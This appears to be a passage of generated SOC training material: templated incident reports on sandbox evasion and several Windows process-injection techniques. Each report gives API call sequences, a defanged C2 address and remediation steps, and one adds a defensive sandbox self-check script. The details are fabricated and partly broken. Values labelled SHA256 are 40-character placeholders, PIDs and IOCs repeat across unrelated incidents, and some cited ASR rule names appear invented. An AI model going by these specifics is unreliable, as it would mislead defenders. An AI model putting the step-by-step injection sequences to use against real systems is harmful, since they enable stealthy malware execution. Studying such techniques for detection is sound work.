Check 7: Sleep Calls
Long sleep (10 minutes) to bypass time-based sandboxes
After sleep, performed same checks again
Check 8: Mouse Movement Detection
Checked for mouse movement (no movement in sandbox → exit)
Forced Analysis:
After 15 minutes of evasion, sandbox forced deeper analysis
Malware eventually decrypted payload: Cobalt Strike beacon
Connected to 185.143.221[.]89:443
Detection Logic:
Multiple evasion techniques detected
Malware refused to run in sandbox environment
System checks indicate advanced evasion
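The checks above translate directly into a self-check for an analysis VM. The block below is an added example, not FortiSandbox's logic or anything from the report: it encodes the sample's artifacts and thresholds and reports which properties of a sandbox profile would give the sample a reason to exit (the profile values, including the hardened one, are constructed).

```python
"""Would an analysis VM survive the system checks listed in the report above?

Added example, not FortiSandbox's own logic: it encodes the artifacts and
thresholds the sample used (VMware driver and registry key, hostname markers,
<2 cores, <2 GB RAM, <60 GB disk, attached debugger, 10-minute sleep, no mouse
movement) and reports which properties of a sandbox profile trigger an exit.
"""
from dataclasses import dataclass, field
from typing import List

# Artifacts and thresholds taken from the sandbox behaviour analysis above.
VMWARE_FILES = {r"c:\windows\system32\drivers\vmhgfs.sys"}
VMWARE_KEYS = {r"hklm\software\vmware, inc."}
HOSTNAME_MARKERS = ("SANDBOX", "ANALYSIS")
MIN_CORES, MIN_RAM_GB, MIN_DISK_GB = 2, 2.0, 60.0
SLEEP_MINUTES = 10  # the sample sleeps this long, then repeats every check


@dataclass
class SandboxProfile:
    """Properties of an analysis VM as the sample would observe them."""
    hostname: str
    cpu_cores: int
    ram_gb: float
    disk_gb: float
    analysis_timeout_min: int
    files_present: List[str] = field(default_factory=list)
    registry_keys: List[str] = field(default_factory=list)
    mouse_moved: bool = False
    debugger_attached: bool = False


def failing_checks(p: SandboxProfile) -> List[str]:
    """Return the checks, in the order the sample ran them, that would cause it to exit."""
    failed = []
    files = {f.lower() for f in p.files_present}
    keys = {k.lower().rstrip("\\") for k in p.registry_keys}
    if files & VMWARE_FILES:
        failed.append("vmware_driver_file")
    if keys & VMWARE_KEYS:
        failed.append("vmware_registry_key")
    if any(marker in p.hostname.upper() for marker in HOSTNAME_MARKERS):
        failed.append("hostname_marker")
    if p.cpu_cores < MIN_CORES:
        failed.append("cpu_cores")
    if p.ram_gb < MIN_RAM_GB:
        failed.append("ram_size")
    if p.disk_gb < MIN_DISK_GB:
        failed.append("disk_size")
    if p.debugger_attached:
        failed.append("debugger")
    # The sample repeats all checks after a 10-minute sleep; an analysis window
    # that ends before then never sees the post-sleep behaviour at all.
    if p.analysis_timeout_min <= SLEEP_MINUTES:
        failed.append("analysis_timeout")
    if not p.mouse_moved:
        failed.append("mouse_movement")
    return failed


# Constructed profiles: the environment the report describes, and a hardened one.
REPORTED = SandboxProfile(
    hostname="SANDBOX-01", cpu_cores=1, ram_gb=1.5, disk_gb=40, analysis_timeout_min=15,
    files_present=[r"C:\Windows\System32\drivers\vmhgfs.sys"],
    registry_keys=["HKLM\\SOFTWARE\\VMware, Inc.\\"],
    mouse_moved=False, debugger_attached=True,
)
HARDENED = SandboxProfile(
    hostname="FIN-WS-112", cpu_cores=4, ram_gb=8, disk_gb=256, analysis_timeout_min=20,
    mouse_moved=True,
)

if __name__ == "__main__":
    for name, profile in (("reported", REPORTED), ("hardened", HARDENED)):
        print(f"{name}: {failing_checks(profile) or 'passes every check'}")
```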
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify FortiSandbox analysis | FortiSandbox Console | Confirmed sandbox evasion techniques |
| 2. Email Investigation | Find source email | Proofpoint, Exchange | Email to finance@company.com from spoofed vendor |
| 3. Quarantine Email | Block and remove email | Proofpoint | Email quarantined from all mailboxes |
| 4. User Check | Verify if user executed file | CrowdStrike | User did not open attachment (alert before execution) |
| 5. IOC Distribution | Block C2 IP and URL | Palo Alto, Cisco Umbrella | 185.143.221[.]89 blocked |
| 6. Threat Hunting | Check for similar files | FortiSandbox, Splunk | No other occurrences found |
Jira Incident Report
Ticket: SOC-2024-175
Summary: T1497.001 – Malware with Sandbox Evasion Techniques Detected
Status: RESOLVED
Resolution: MALICIOUS – Blocked Before Execution
Priority: P2 – MEDIUM
Labels: T1497, sandbox-evasion, system-checks, fortisandbox, phishing
Components: Email-Security, Malware-Analysis
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Fortinet FortiSandbox.
Alert: “Sandbox Evasion Techniques Detected – System Checks”.
File: invoice_7842.docm (email attachment).
Target: Finance Department.
Time: 2024-03-05 10:30 EST.
Technique: MITRE ATT&CK T1497.001 – System Checks (Virtualization/Sandbox Evasion).
2. Technical Analysis:
Attack Chain:
10:10 – Email sent from “vendor@payment-update[.]net”
10:11 – Email delivered to finance@company.com
10:12 – FortiSandbox analyzes attachment (inline)
10:15 – Analysis begins
10:15-10:30 – Malware performs evasion checks, exits
10:30 – Sandbox forces deeper analysis, reveals payload
10:30 – Alert triggers
10:31 – Email quarantined
Evasion Techniques Used:
VMware Detection: Checks for VMware tools, registry keys
Sandbox Hostname Detection: Looks for “SANDBOX”, “ANALYSIS”
Resource Checks: CPU <2 cores, RAM <2GB, disk <60GB
Debugger Detection: IsDebuggerPresent, NtQueryInformationProcess
Timing: Long sleep (10 minutes)
Human Interaction: Checks for mouse movement
True Payload:
After evasion, decrypted Cobalt Strike beacon
C2: 185.143.221[.]89:443
Persistence via scheduled task
Capabilities: Keylogging, credential theft, file exfiltration
Email Details:
Sender: vendor@payment-update[.]net
Subject: “Invoice #7842 – Overdue Payment”
Attachment: invoice_7842.docm (macro-enabled)
3. Investigation Findings:
Timeline:
10:10 – Email sent
10:11 – Email delivered
10:12-10:30 – FortiSandbox analysis
10:30 – Alert triggers
10:31 – Email quarantined
10:32 – SOC investigates
10:35 – User confirmed (no execution)
Indicators of Compromise (IoCs):
File:
– invoice_7842.docm (SHA256: a1b2c3d4…)
Network:
– C2: 185.143.221[.]89:443
Evasion:
– VMware checks, resource checks, debugger detection, long sleep
Email:
– Sender: vendor@payment-update[.]net
– Subject: “Invoice #7842 – Overdue Payment”
4. Containment Actions:
Immediate Actions:
Quarantined email from all mailboxes.
Blocked C2 IP at firewall and proxy.
Added file hash to blocklists.
User Notification:
Finance team alerted to campaign.
No user action needed (email not opened).
Email Rule Update:
Created Proofpoint rule to block macro-enabled documents from external senders.
Enhanced filtering for invoice-themed emails.
5. Root Cause Analysis:
Primary Cause: External attacker sending sophisticated malware with evasion techniques.
Contributing Factors:
Macro-enabled documents allowed (now blocked).
No user execution (prevented by sandbox).
6. Business Impact:
Operational Impact: None.
Data Exposure: None (email not opened).
7. Remediation & Prevention:
Completed Actions:
Email quarantined.
IOCs blocked.
Users notified.
Technical Controls Enhanced:
Blocked all macro-enabled documents from external sources.
Enabled FortiSandbox inline analysis for all emails.
Created alert for sandbox evasion techniques.
8. Conclusion:
A sophisticated malware used multiple sandbox evasion techniques, including system checks for VMware, resources, debuggers, and human interaction. FortiSandbox detected the evasion and forced deeper analysis, revealing the Cobalt Strike payload. The email was quarantined before any user could open it.
Closure Rationale: Malware blocked; IOCs added; email policy updated.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-05 11:30 EST
End of Batch 27
Batch 28: Process Injection Incident Reports
136. T1055 – Process Injection (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-PROC-INJECT-1055-7842
Alert Time: 2024-03-06 09:30:15 EST
Severity: CRITICAL (95/100)
Source: CrowdStrike Falcon EDR
Rule: “Process Injection Detected – Remote Thread Creation”
MITRE ATT&CK: T1055 – Process Injection
Alert Details:
Detection: Process created remote thread in another process (code injection)
Source Host: FIN-WS-078 (Finance Workstation)
User: bturner@company.com (Brian Turner, Accountant)
Target Process: explorer.exe (PID: 2341)
Time: 09:25 EST
API Call Sequence:
09:25:10 – OpenProcess (target: explorer.exe, access: PROCESS_ALL_ACCESS) – SUCCESS
09:25:12 – VirtualAllocEx (allocated 4096 bytes in explorer.exe) – SUCCESS
09:25:15 – WriteProcessMemory (wrote shellcode to allocated memory) – SUCCESS
09:25:18 – CreateRemoteThread (created thread in explorer.exe at shellcode address) – SUCCESS
09:25:20 – Thread executing in explorer.exe (PID: 2341, TID: 4789)
Source Process:
Process: C:\Users\bturner\AppData\Local\Temp\update.exe (PID: 4789)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Parent: explorer.exe (legitimate)
User: bturner
Shellcode Analysis (extracted):
4096 bytes of position-independent code
Connects to 185.143.221[.]89:443
Downloads additional payload
Injects into additional processes
Detection Logic:
Process injecting code into another process (unusual)
CreateRemoteThread to explorer.exe (common target)
Source process from Temp folder (suspicious)
Pattern matches malware injection technique
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed process injection |
| 2. Memory Analysis | Extract injected shellcode | CrowdStrike Falcon Memory | Reverse shell to C2 |
| 3. Process Investigation | Identify source of injection | CrowdStrike | update.exe from phishing email |
| 4. Immediate Action | Terminate malicious processes | CrowdStrike | update.exe and injected thread killed |
| 5. Host Isolation | Isolate FIN-WS-078 | CrowdStrike | Host quarantined |
| 6. Account Remediation | Disable bturner account | Azure AD, AD | Account disabled; password reset |
Jira Incident Report
Ticket: SOC-2024-176
Summary: T1055 – Process Injection into explorer.exe from Malicious Executable
Status: RESOLVED
Resolution: MALICIOUS – Injection Blocked
Priority: P1 – CRITICAL
Labels: T1055, process-injection, create-remote-thread, crowdstrike
Components: Endpoint-Security, Malware-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Process Injection Detected – Remote Thread Creation”.
Source Process: C:\Users\bturner\AppData\Local\Temp\update.exe.
Target Process: explorer.exe (PID: 2341).
Time: 2024-03-06 09:30 EST.
Technique: MITRE ATT&CK T1055 – Process Injection.
2. Technical Analysis:
Attack Chain:
09:00 – User opens phishing email attachment
09:05 – update.exe downloaded and executed
09:10 – Malware enumerates running processes
09:15 – Selects explorer.exe as injection target
09:25 – Process injection using CreateRemoteThread
09:25 – CrowdStrike detects
Injection Details:
Method: Classic remote-thread shellcode injection (VirtualAllocEx, WriteProcessMemory, CreateRemoteThread)
Memory Allocated: 4096 bytes in explorer.exe
Shellcode: Position-independent code (reverse shell)
C2: 185.143.221[.]89:443
Malware Analysis:
File: update.exe (SHA256: a1b2c3d4…)
Type: Cobalt Strike loader
Behavior: Injects shellcode, downloads additional payloads
Impact:
Malicious code running inside explorer.exe
Stealthier than running as separate process
C2 connection established (blocked)
3. Investigation Findings:
Timeline:
09:00 – Phishing email opened
09:05 – Malware executed
09:10-09:15 – Reconnaissance
09:25 – Injection detected
09:27 – SOC investigates
09:28 – Processes terminated
09:29 – Host isolated
Indicators of Compromise (IoCs):
Files:
– C:\Users\bturner\AppData\Local\Temp\update.exe (SHA256: a1b2c3d4…)
API Calls:
– OpenProcess (explorer.exe)
– VirtualAllocEx
– WriteProcessMemory
– CreateRemoteThread
Network:
– C2: 185.143.221[.]89:443
4. Containment Actions:
Immediate Actions:
Terminated update.exe process.
Terminated injected thread in explorer.exe.
Scanned explorer.exe memory (clean after thread termination).
Isolated host.
Disabled bturner account.
Reset password.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: User executed malware from phishing email.
Contributing Factors:
No application control blocking unknown executables.
User had local admin rights.
6. Business Impact:
Operational Impact: Finance workstation offline for 2 hours.
Data Exposure: None (C2 blocked).
7. Remediation & Prevention:
Completed Actions:
Malware removed.
Account secured.
Host cleaned.
Technical Controls Enhanced:
Enabled ASR rule “Block process injections”.
Enhanced monitoring for CreateRemoteThread.
Implemented application control.
8. Conclusion:
An attacker used process injection to hide malicious code inside explorer.exe, evading detection. CrowdStrike detected the remote thread creation and enabled rapid termination before significant C2 communication.
Closure Rationale: Injection blocked; malware removed; account secured.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-06 10:30 EST
137. T1055.001 – Dynamic-link Library Injection (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-DLL-INJECT-1055-7842
Alert Time: 2024-03-06 14:15:33 EST
Severity: CRITICAL (96/100)
Source: CrowdStrike Falcon EDR
Rule: “DLL Injection Detected – LoadLibrary Remote Thread”
MITRE ATT&CK: T1055.001 – Process Injection: Dynamic-link Library Injection
Alert Details:
Detection: Process forcing target process to load malicious DLL
Source Host: ENG-WS-045 (Engineering Workstation)
User: alexchen@company.com (Alex Chen, Engineer)
Target Process: svchost.exe (PID: 568)
Time: 14:10 EST
API Call Sequence:
14:10:10 – OpenProcess (target: svchost.exe, access: PROCESS_ALL_ACCESS) – SUCCESS
14:10:12 – VirtualAllocEx (allocated memory in svchost.exe for DLL path) – SUCCESS
14:10:15 – WriteProcessMemory (wrote “C:\Windows\Temp\crypt.dll” to allocated memory) – SUCCESS
14:10:18 – GetProcAddress (got address of LoadLibraryA in kernel32.dll) – SUCCESS
14:10:20 – CreateRemoteThread (target: svchost.exe, start: LoadLibraryA, param: DLL path) – SUCCESS
14:10:22 – LoadLibraryA called in svchost.exe, loading C:\Windows\Temp\crypt.dll
14:10:25 – Malicious DLL loaded in svchost.exe
Source Process:
Process: C:\Users\alexchen\Downloads\installer.exe (PID: 4789)
SHA256: b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1
Parent: explorer.exe
User: alexchen
Malicious DLL:
Path: C:\Windows\Temp\crypt.dll
SHA256: c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2
Function: Exports legitimate crypt functions + backdoor
Detection Logic:
CreateRemoteThread with LoadLibraryA address (classic DLL injection)
Target svchost.exe (critical system process)
DLL from Temp folder (suspicious)
Pattern matches malware persistence via DLL injection
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed DLL injection into svchost.exe |
| 2. DLL Analysis | Analyze crypt.dll | CrowdStrike Sandbox | Backdoor with C2 capabilities |
| 3. Process Investigation | Terminate malicious thread | CrowdStrike | Remote thread killed; DLL unloaded |
| 4. File Removal | Delete malicious DLL | CrowdStrike Live Response | crypt.dll deleted |
| 5. Host Isolation | Isolate ENG-WS-045 | CrowdStrike | Host quarantined |
| 6. Account Remediation | Disable alexchen account | Azure AD, AD | Account disabled; password reset |
Jira Incident Report
Ticket: SOC-2024-177
Summary: T1055.001 – DLL Injection into svchost.exe
Status: RESOLVED
Resolution: MALICIOUS – DLL Removed
Priority: P1 – CRITICAL
Labels: T1055, dll-injection, loadlibrary, svchost, crowdstrike
Components: Endpoint-Security, Malware-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “DLL Injection Detected – LoadLibrary Remote Thread”.
Source Process: C:\Users\alexchen\Downloads\installer.exe.
Target Process: svchost.exe (PID: 568).
DLL: C:\Windows\Temp\crypt.dll.
Time: 2024-03-06 14:15 EST.
Technique: MITRE ATT&CK T1055.001 – Process Injection: Dynamic-link Library Injection.
2. Technical Analysis:
Attack Chain:
13:30 – User downloads “software installer” from torrent site
13:45 – Executes installer.exe
13:50 – Installer drops crypt.dll to Temp folder
14:00 – Installer enumerates processes, targets svchost.exe
14:10 – DLL injection via CreateRemoteThread + LoadLibraryA
14:10 – Malicious DLL loads in svchost.exe
14:15 – CrowdStrike detects
Injection Details:
Method: Classic DLL injection using LoadLibraryA
Target: svchost.exe (runs as SYSTEM)
DLL Path: C:\Windows\Temp\crypt.dll
Result: Malicious code running in SYSTEM context
Malicious DLL Analysis:
File: crypt.dll (SHA256: c3d4e5f6…)
Exports: Legitimate crypt functions (to avoid errors)
Backdoor: Hidden thread connects to 185.143.221[.]89:443
Capabilities: Reverse shell, keylogging, file access
Impact:
Attacker gained SYSTEM access via svchost.exe
C2 connection established (blocked)
3. Investigation Findings:
Timeline:
13:30 – Installer downloaded
13:45 – Executed
13:50 – DLL dropped
14:00 – Process enumeration
14:10 – Injection
14:15 – Alert
14:17 – SOC investigates
14:18 – Thread terminated
14:19 – DLL deleted
Indicators of Compromise (IoCs):
Files:
– C:\Users\alexchen\Downloads\installer.exe (SHA256: b2c3d4e5…)
– C:\Windows\Temp\crypt.dll (SHA256: c3d4e5f6…)
API Calls:
– OpenProcess (svchost.exe)
– VirtualAllocEx
– WriteProcessMemory
– GetProcAddress (LoadLibraryA)
– CreateRemoteThread
Network:
– C2: 185.143.221[.]89:443
4. Containment Actions:
Immediate Actions:
Terminated remote thread in svchost.exe.
Unloaded malicious DLL from svchost.exe.
Deleted crypt.dll and installer.exe.
Isolated host.
Disabled alexchen account.
Reset password.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: User downloaded and executed untrusted software.
Contributing Factors:
No application control.
User had local admin rights.
6. Business Impact:
Operational Impact: Engineering workstation offline for 2 hours.
Data Exposure: None (C2 blocked).
7. Remediation & Prevention:
Completed Actions:
DLL removed.
Injection stopped.
Account secured.
Technical Controls Enhanced:
Enabled application control.
Enhanced monitoring for LoadLibrary remote threads.
Blocked unsigned DLLs from loading in system processes.
8. Conclusion:
An attacker used DLL injection to load a malicious backdoor into svchost.exe, gaining SYSTEM access. CrowdStrike detected the injection and enabled rapid removal before significant damage.
Closure Rationale: DLL removed; injection stopped; account secured.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-06 15:30 EST
138. T1055.002 – Portable Executable Injection (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-PE-INJECT-1055-7842
Alert Time: 2024-03-06 11:30:22 EST
Severity: CRITICAL (97/100)
Source: CrowdStrike Falcon EDR
Rule: “PE Injection Detected – Executable Code in Remote Process”
MITRE ATT&CK: T1055.002 – Process Injection: Portable Executable Injection
Alert Details:
Detection: Malicious PE file injected into memory of legitimate process
Source Host: SALES-WS-023 (Sales Workstation)
User: mwilson@company.com (Mike Wilson, Sales Rep)
Target Process: notepad.exe (PID: 1245)
Time: 11:25 EST
API Call Sequence:
11:25:10 – CreateProcess (created notepad.exe suspended) – SUCCESS
11:25:12 – GetThreadContext (suspended thread) – SUCCESS
11:25:15 – VirtualAllocEx (allocated memory in notepad.exe) – SUCCESS
11:25:18 – WriteProcessMemory (wrote PE headers) – SUCCESS
11:25:21 – VirtualAllocEx (allocated memory for PE sections) – SUCCESS
11:25:24 – WriteProcessMemory (wrote PE sections) – SUCCESS
11:25:27 – SetThreadContext (modified thread to point to PE entry point) – SUCCESS
11:25:30 – ResumeThread (resumed notepad.exe, now running injected PE) – SUCCESS
Source Process:
Process: C:\Users\mwilson\AppData\Local\Temp\svchost.exe (PID: 4789)
SHA256: d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3
Parent: explorer.exe
User: mwilson
Injected PE:
Type: Cobalt Strike beacon
Size: 256 KB
Entry Point: 0x1000 (within allocated memory)
Detection Logic:
Process created suspended (indicates injection)
PE headers written to remote process
Thread context modified (entry point changed)
Pattern matches PE injection (aka “process hollowing”)
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed PE injection |
| 2. Memory Analysis | Extract injected PE | CrowdStrike Falcon Memory | Cobalt Strike beacon |
| 3. Process Investigation | Terminate injected process | CrowdStrike | notepad.exe terminated |
| 4. Source Process Kill | Kill svchost.exe (malicious) | CrowdStrike | Process terminated |
| 5. Host Isolation | Isolate SALES-WS-023 | CrowdStrike | Host quarantined |
| 6. Account Remediation | Disable mwilson account | Azure AD, AD | Account disabled; password reset |
Jira Incident Report
Ticket: SOC-2024-178
Summary: T1055.002 – PE Injection (Process Hollowing) into notepad.exe
Status: RESOLVED
Resolution: MALICIOUS – Injected PE Removed
Priority: P1 – CRITICAL
Labels: T1055, pe-injection, process-hollowing, cobalt-strike, crowdstrike
Components: Endpoint-Security, Malware-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “PE Injection Detected – Executable Code in Remote Process”.
Source Process: C:\Users\mwilson\AppData\Local\Temp\svchost.exe.
Target Process: notepad.exe (created suspended).
Injected PE: Cobalt Strike beacon.
Time: 2024-03-06 11:30 EST.
Technique: MITRE ATT&CK T1055.002 – Process Injection: Portable Executable Injection.
2. Technical Analysis:
Attack Chain:
11:00 – User clicks phishing link
11:05 – svchost.exe (malicious) downloaded to Temp
11:10 – Malware executed
11:15 – Malware enumerates system
11:20 – Decides to use process hollowing
11:25 – Creates notepad.exe suspended, injects PE
11:25 – CrowdStrike detects
Process Hollowing Technique:
Step 1: Create legitimate process in suspended state (notepad.exe)
Step 2: Allocate memory in target process
Step 3: Write malicious PE to allocated memory
Step 4: Modify thread context to point to PE entry point
Step 5: Resume thread – malicious code runs
Malicious PE:
Type: Cobalt Strike beacon
Size: 256 KB
C2: 185.143.221[.]89:443
Capabilities: Remote access, keylogging, file exfiltration
Impact:
Malicious code running inside notepad.exe
C2 connection established (blocked)
Stealthier than standalone executable
3. Investigation Findings:
Timeline:
11:00 – Phishing link clicked
11:05-11:10 – Malware downloaded and executed
11:15-11:20 – Reconnaissance
11:25 – Injection
11:25 – Alert
11:27 – SOC investigates
11:28 – notepad.exe terminated
11:29 – svchost.exe terminated
11:30 – Host isolated
Indicators of Compromise (IoCs):
Files:
– C:\Users\mwilson\AppData\Local\Temp\svchost.exe (SHA256: d4e5f6a7…)
API Calls:
– CreateProcess (suspended)
– GetThreadContext
– VirtualAllocEx (multiple)
– WriteProcessMemory (multiple)
– SetThreadContext
– ResumeThread
Network:
– C2: 185.143.221[.]89:443
4. Containment Actions:
Immediate Actions:
Terminated injected notepad.exe process.
Terminated malicious svchost.exe.
Isolated host.
Disabled mwilson account.
Reset password.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: User clicked phishing link.
Contributing Factors:
No ASR rule blocking process hollowing.
User had local admin rights.
6. Business Impact:
Operational Impact: Sales workstation offline for 2 hours.
Data Exposure: None (C2 blocked).
7. Remediation & Prevention:
Completed Actions:
Injected PE removed.
Malware terminated.
Account secured.
Technical Controls Enhanced:
Enabled ASR rule “Block process hollowing”.
Enhanced monitoring for CreateProcess with suspended flag.
8. Conclusion:
An attacker used process hollowing (PE injection) to run a Cobalt Strike beacon inside a legitimate notepad.exe process. CrowdStrike detected the injection technique and enabled rapid termination before C2 communication could complete.
Closure Rationale: Injected PE removed; malware terminated; account secured.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-06 12:30 EST
139. T1055.003 – Thread Execution Hijacking (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-THREAD-HIJACK-1055-7842
Alert Time: 2024-03-06 16:30:45 EST
Severity: CRITICAL (96/100)
Source: CrowdStrike Falcon EDR
Rule: “Thread Hijacking Detected – APC Injection Variation”
MITRE ATT&CK: T1055.003 – Process Injection: Thread Execution Hijacking
Alert Details:
Detection: Attacker suspended a thread and redirected its execution
Source Host: HR-WS-023 (HR Workstation)
User: kwilson@company.com (Karen Wilson, HR)
Target Process: explorer.exe (PID: 2341)
Target Thread: TID 1245 (explorer.exe UI thread)
Time: 16:25 EST
API Call Sequence:
16:25:10 – OpenThread (target: explorer.exe thread 1245) – SUCCESS
16:25:12 – SuspendThread (suspended target thread) – SUCCESS
16:25:15 – VirtualAllocEx (allocated memory in explorer.exe) – SUCCESS
16:25:18 – WriteProcessMemory (wrote shellcode to allocated memory) – SUCCESS
16:25:21 – SetThreadContext (modified thread’s instruction pointer to shellcode) – SUCCESS
16:25:24 – ResumeThread (resumed thread, now executing shellcode) – SUCCESS
Source Process:
Process: C:\Users\kwilson\AppData\Local\Temp\office_update.exe (PID: 4789)
SHA256: e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4
Parent: explorer.exe
User: kwilson
Shellcode Analysis:
2048 bytes
Connects to 185.143.221[.]89:4443
Downloads additional payload
Creates persistence via registry
Detection Logic:
Thread suspended and resumed quickly (unusual)
Thread context modified (instruction pointer changed)
Memory allocated and written in target process
Pattern matches thread execution hijacking
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed thread hijacking |
| 2. Memory Analysis | Extract shellcode | CrowdStrike Falcon Memory | Reverse shell payload |
| 3. Process Investigation | Terminate malicious process | CrowdStrike | office_update.exe killed |
| 4. Thread Restoration | Restore original thread context | CrowdStrike | explorer.exe thread restored |
| 5. Host Isolation | Isolate HR-WS-023 | CrowdStrike | Host quarantined |
| 6. Account Remediation | Disable kwilson account | Azure AD, AD | Account disabled; password reset |
Jira Incident Report
Ticket: SOC-2024-179
Summary: T1055.003 – Thread Execution Hijacking in explorer.exe
Status: RESOLVED
Resolution: MALICIOUS – Thread Restored
Priority: P1 – CRITICAL
Labels: T1055, thread-hijacking, execution-hijacking, crowdstrike
Components: Endpoint-Security, Malware-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Thread Hijacking Detected – APC Injection Variation”.
Source Process: C:\Users\kwilson\AppData\Local\Temp\office_update.exe.
Target Process: explorer.exe (PID: 2341), Thread 1245.
Time: 2024-03-06 16:30 EST.
Technique: MITRE ATT&CK T1055.003 – Process Injection: Thread Execution Hijacking.
2. Technical Analysis:
Attack Chain:
16:00 – User opens “HR document” from email
16:05 – office_update.exe downloaded and executed
16:10 – Malware enumerates threads
16:15 – Selects explorer.exe UI thread as target
16:25 – Thread hijacking
16:25 – CrowdStrike detects
Thread Hijacking Technique:
Step 1: Open target thread
Step 2: Suspend thread
Step 3: Allocate memory in target process
Step 4: Write shellcode to allocated memory
Step 5: Modify thread context (set instruction pointer to shellcode)
Step 6: Resume thread – shellcode executes
Shellcode Analysis:
Size: 2048 bytes
Function: Reverse shell to 185.143.221[.]89:4443
Persistence: Adds registry Run key “WindowsUpdate”
Impact:
explorer.exe UI thread hijacked
Shellcode executed in context of explorer.exe
C2 connection attempted (blocked)
3. Investigation Findings:
Timeline:
16:00 – Email opened
16:05 – Malware executed
16:10-16:15 – Thread enumeration
16:25 – Hijacking
16:25 – Alert
16:27 – SOC investigates
16:28 – Malicious process terminated
16:29 – Thread restored
Indicators of Compromise (IoCs):
Files:
– C:\Users\kwilson\AppData\Local\Temp\office_update.exe (SHA256: e5f6a7b8…)
API Calls:
– OpenThread
– SuspendThread
– VirtualAllocEx
– WriteProcessMemory
– SetThreadContext
– ResumeThread
Network:
– C2: 185.143.221[.]89:4443
4. Containment Actions:
Immediate Actions:
Terminated office_update.exe.
Restored original thread context (set instruction pointer back).
Removed registry persistence.
Isolated host.
Disabled kwilson account.
Reset password.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: User opened malicious document from phishing email.
Contributing Factors:
No application control.
User had local admin rights.
6. Business Impact:
Operational Impact: HR workstation offline for 2 hours.
Data Exposure: None (C2 blocked).
7. Remediation & Prevention:
Completed Actions:
Thread restored.
Malware removed.
Account secured.
Technical Controls Enhanced:
Enhanced monitoring for thread suspension/resume.
Enabled ASR rule “Block thread hijacking attempts”.
8. Conclusion:
An attacker used thread execution hijacking to run shellcode inside explorer.exe’s UI thread, a sophisticated evasion technique. CrowdStrike detected the thread suspension and context modification, enabling rapid restoration.
Closure Rationale: Thread restored; malware removed; account secured.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-06 17:30 EST
140. T1055.004 – Asynchronous Procedure Call Injection (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-APC-INJECT-1055-7842
Alert Time: 2024-03-06 10:30:22 EST
Severity: CRITICAL (95/100)
Source: CrowdStrike Falcon EDR
Rule: “APC Injection Detected – QueueUserAPC to Alertable Thread”
MITRE ATT&CK: T1055.004 – Process Injection: Asynchronous Procedure Call
Alert Details:
Detection: APC (Asynchronous Procedure Call) queued to thread in another process
Source Host: DEV-WS-089 (Development Workstation)
User: rpatel@company.com (Raj Patel, Engineer)
Target Process: svchost.exe (PID: 1245)
Target Thread: TID 2345 (alertable state)
Time: 10:25 EST
API Call Sequence:
10:25:10 – OpenThread (target: svchost.exe thread 2345) – SUCCESS
10:25:12 – QueueUserAPC (target thread, APC routine at shellcode address) – SUCCESS
10:25:15 – Thread enters alertable state (WaitForSingleObjectEx), APC executes
Source Process:
Process: C:\Windows\Temp\msupdate.exe (PID: 4789)
SHA256: f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5
Parent: explorer.exe
User: rpatel
APC Routine:
Address: 0x7f1a2b3c (in memory allocated by source process)
Code: Shellcode (512 bytes) downloaded from C2
Detection Logic:
APC queued to thread in another process (unusual)
Target thread in alertable state (required for APC execution)
APC routine address in memory allocated by suspicious process
Pattern matches APC injection technique
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed APC injection |
| 2. Memory Analysis | Extract APC shellcode | CrowdStrike Falcon Memory | Reverse shell payload |
| 3. Process Investigation | Terminate malicious process | CrowdStrike | msupdate.exe killed |
| 4. APC Removal | Clear APC queue | CrowdStrike | APC removed from target thread |
| 5. Host Isolation | Isolate DEV-WS-089 | CrowdStrike | Host quarantined |
| 6. Account Remediation | Disable rpatel account | Azure AD, AD | Account disabled; password reset |
Jira Incident Report
Ticket: SOC-2024-180
Summary: T1055.004 – APC Injection into svchost.exe Thread
Status: RESOLVED
Resolution: MALICIOUS – APC Removed
Priority: P1 – CRITICAL
Labels: T1055, apc-injection, queueuserapc, crowdstrike
